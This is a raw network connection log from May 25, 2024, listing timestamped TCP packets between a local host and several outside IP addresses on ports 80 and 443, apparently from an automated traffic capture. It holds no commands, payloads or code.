May 25, 2024 21:29:46.680481911 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:46.680722952 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:46.680759907 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:46.681957960 CEST	80	49763	158.160.165.129	192.168.2.4
May 25, 2024 21:29:46.731328964 CEST	80	49764	158.160.165.129	192.168.2.4
May 25, 2024 21:29:46.731445074 CEST	49764	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:46.731628895 CEST	49764	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:46.731661081 CEST	49764	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:46.764197111 CEST	80	49764	158.160.165.129	192.168.2.4
May 25, 2024 21:29:46.764210939 CEST	80	49764	158.160.165.129	192.168.2.4
May 25, 2024 21:29:46.764224052 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.764292002 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.764492035 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.764621019 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.764992952 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.765007973 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.765037060 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.765059948 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.765578985 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.765595913 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.765623093 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.765650034 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.766705990 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.766724110 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.766758919 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.766797066 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.770049095 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.770064116 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.770117044 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.770529032 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.770623922 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.770874023 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.770908117 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.770940065 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.770955086 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.770992994 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.771222115 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.771256924 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.771303892 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.771781921 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.771816015 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.771838903 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.771879911 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.776191950 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.776226044 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.776266098 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.776319981 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.776834011 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.776866913 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.776884079 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.776910067 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.778850079 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.778883934 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.778906107 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.778915882 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.778925896 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.778959036 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.778985977 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.779019117 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.779027939 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.779061079 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.780662060 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.780695915 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.780746937 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.781569004 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.781601906 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.781636953 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.781672955 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.783071041 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.783104897 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.783132076 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.783137083 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.783169985 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.783214092 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.784208059 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.784243107 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.784255981 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.784292936 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.785325050 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.785357952 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.785413027 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.786452055 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.786503077 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.786515951 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.786549091 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.787580013 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.787612915 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.787641048 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.787661076 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.794938087 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.794990063 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795022011 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795048952 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.795056105 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795089006 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795092106 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.795126915 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.795491934 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795525074 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795578957 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.795922041 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795954943 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.795994043 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.796010017 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.796798944 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.796833038 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.796855927 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.796864986 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.796890020 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.796925068 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.917448044 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.917491913 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.917537928 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.917566061 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.917943001 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.917980909 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.918036938 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.918545008 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.918579102 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.918606043 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.918628931 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.919034958 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.919065952 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.919087887 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.919116020 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.919658899 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.919694901 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.919723988 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.919753075 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.919780016 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.920725107 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.920758009 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.920783997 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.920821905 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.921308041 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.921340942 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.921363115 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.921370029 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.921390057 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.921413898 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.922382116 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.922435999 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.923019886 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.923053980 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.923079014 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.923085928 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.923114061 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.923136950 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.924125910 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.924160004 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.924206018 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.924384117 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.925229073 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.925261974 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.925292015 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.925313950 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.925344944 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.926362038 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.926397085 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.926414967 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.926429033 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.926445007 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.926474094 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.927450895 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.927484989 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.927541018 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.928551912 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.928589106 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.928638935 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.929683924 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.929717064 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.929743052 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.929749966 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.929830074 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.929830074 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.930833101 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.930867910 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.930885077 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.930927992 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.931963921 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.931999922 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.932051897 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.933073997 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.933108091 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.933139086 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.933165073 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.933175087 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.933202028 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.934189081 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.934222937 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.934276104 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.935332060 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.935365915 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.935421944 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.935445070 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.936419010 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.936453104 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.936474085 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.936511040 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.937306881 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.937340975 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.937371969 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.937405109 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.937413931 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.938190937 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.938224077 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.938256025 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.938462973 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.939091921 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.939126015 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.939141035 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.939198971 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.940046072 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.940079927 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.940119028 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.940146923 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.940898895 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.940932989 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.940964937 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.941001892 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.941001892 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.941035986 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.941737890 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.941771030 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.941801071 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.941937923 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:46.985045910 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:46.985117912 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.084476948 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.084525108 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.084551096 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.084569931 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.085182905 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.085217953 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.085270882 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.085756063 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.085791111 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.085848093 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.089417934 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.089452982 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.089513063 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.089513063 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.241240025 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.242002964 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.246963024 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:47.247042894 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.462054014 CEST	80	49764	158.160.165.129	192.168.2.4
May 25, 2024 21:29:47.470448971 CEST	80	49764	158.160.165.129	192.168.2.4
May 25, 2024 21:29:47.470730066 CEST	49764	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:47.677144051 CEST	49764	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:47.684478045 CEST	80	49764	158.160.165.129	192.168.2.4
May 25, 2024 21:29:47.685390949 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:47.685499907 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:47.686331034 CEST	49766	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:47.692584038 CEST	80	49766	158.160.165.129	192.168.2.4
May 25, 2024 21:29:47.692682028 CEST	49766	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:47.693104982 CEST	49766	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:47.693207979 CEST	49766	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:47.714097023 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:47.727618933 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:47.727690935 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:47.728589058 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:47.728677034 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:47.731729031 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:47.750032902 CEST	80	49766	158.160.165.129	192.168.2.4
May 25, 2024 21:29:47.774525881 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:47.796060085 CEST	80	49766	158.160.165.129	192.168.2.4
May 25, 2024 21:29:47.796103001 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:48.260659933 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:48.260713100 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:48.261049032 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:48.414397955 CEST	80	49766	158.160.165.129	192.168.2.4
May 25, 2024 21:29:48.421046972 CEST	80	49766	158.160.165.129	192.168.2.4
May 25, 2024 21:29:48.422215939 CEST	49766	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:49.609261036 CEST	49766	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:49.616693020 CEST	80	49766	158.160.165.129	192.168.2.4
May 25, 2024 21:29:49.860682011 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:49.865888119 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:49.865998983 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:49.866228104 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:49.866278887 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:49.892735958 CEST	49765	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:49.892801046 CEST	443	49765	65.109.242.59	192.168.2.4
May 25, 2024 21:29:49.924721003 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:49.971534967 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.065172911 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:50.065253019 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:50.065347910 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:50.154098988 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:50.154177904 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:50.749275923 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.749463081 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.754122972 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.754154921 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.754199982 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.754235029 CEST	49767	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.780529976 CEST	49769	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.802154064 CEST	80	49767	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.853854895 CEST	80	49769	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.854255915 CEST	49769	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.854255915 CEST	49769	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.854255915 CEST	49769	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:50.855050087 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:50.855144978 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:50.876403093 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:50.876420975 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:50.878635883 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:50.878642082 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:50.915395021 CEST	80	49769	158.160.165.129	192.168.2.4
May 25, 2024 21:29:50.915411949 CEST	80	49769	158.160.165.129	192.168.2.4
May 25, 2024 21:29:51.638317108 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:51.638391018 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:51.638417959 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:51.638430119 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:51.638468981 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:51.638497114 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:51.649712086 CEST	49768	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:51.649732113 CEST	443	49768	65.109.242.59	192.168.2.4
May 25, 2024 21:29:51.689519882 CEST	80	49769	158.160.165.129	192.168.2.4
May 25, 2024 21:29:51.689555883 CEST	80	49769	158.160.165.129	192.168.2.4
May 25, 2024 21:29:51.689749002 CEST	49769	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:51.691199064 CEST	49769	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:51.699417114 CEST	49770	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:51.699620008 CEST	80	49769	158.160.165.129	192.168.2.4
May 25, 2024 21:29:51.704639912 CEST	80	49770	158.160.165.129	192.168.2.4
May 25, 2024 21:29:51.704730988 CEST	49770	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:51.704930067 CEST	49770	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:51.704977989 CEST	49770	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:51.761734962 CEST	80	49770	158.160.165.129	192.168.2.4
May 25, 2024 21:29:51.807662010 CEST	80	49770	158.160.165.129	192.168.2.4
May 25, 2024 21:29:52.445130110 CEST	80	49770	158.160.165.129	192.168.2.4
May 25, 2024 21:29:52.445451975 CEST	49770	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:52.449736118 CEST	80	49770	158.160.165.129	192.168.2.4
May 25, 2024 21:29:52.449810028 CEST	49770	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:52.497606039 CEST	80	49770	158.160.165.129	192.168.2.4
May 25, 2024 21:29:52.515536070 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:52.515631914 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:52.515722036 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:52.574904919 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:52.574981928 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:52.658126116 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:52.658205986 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:52.658538103 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:52.682106018 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:52.682184935 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:52.817666054 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:52.817703009 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:52.817761898 CEST	49773	443	192.168.2.4	192.185.16.114
